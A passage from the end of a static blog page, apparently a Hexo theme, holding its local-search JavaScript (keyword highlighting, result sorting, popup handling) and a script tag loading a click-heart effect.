                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  
  


  

  

  
  <!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>

</body>
</html>
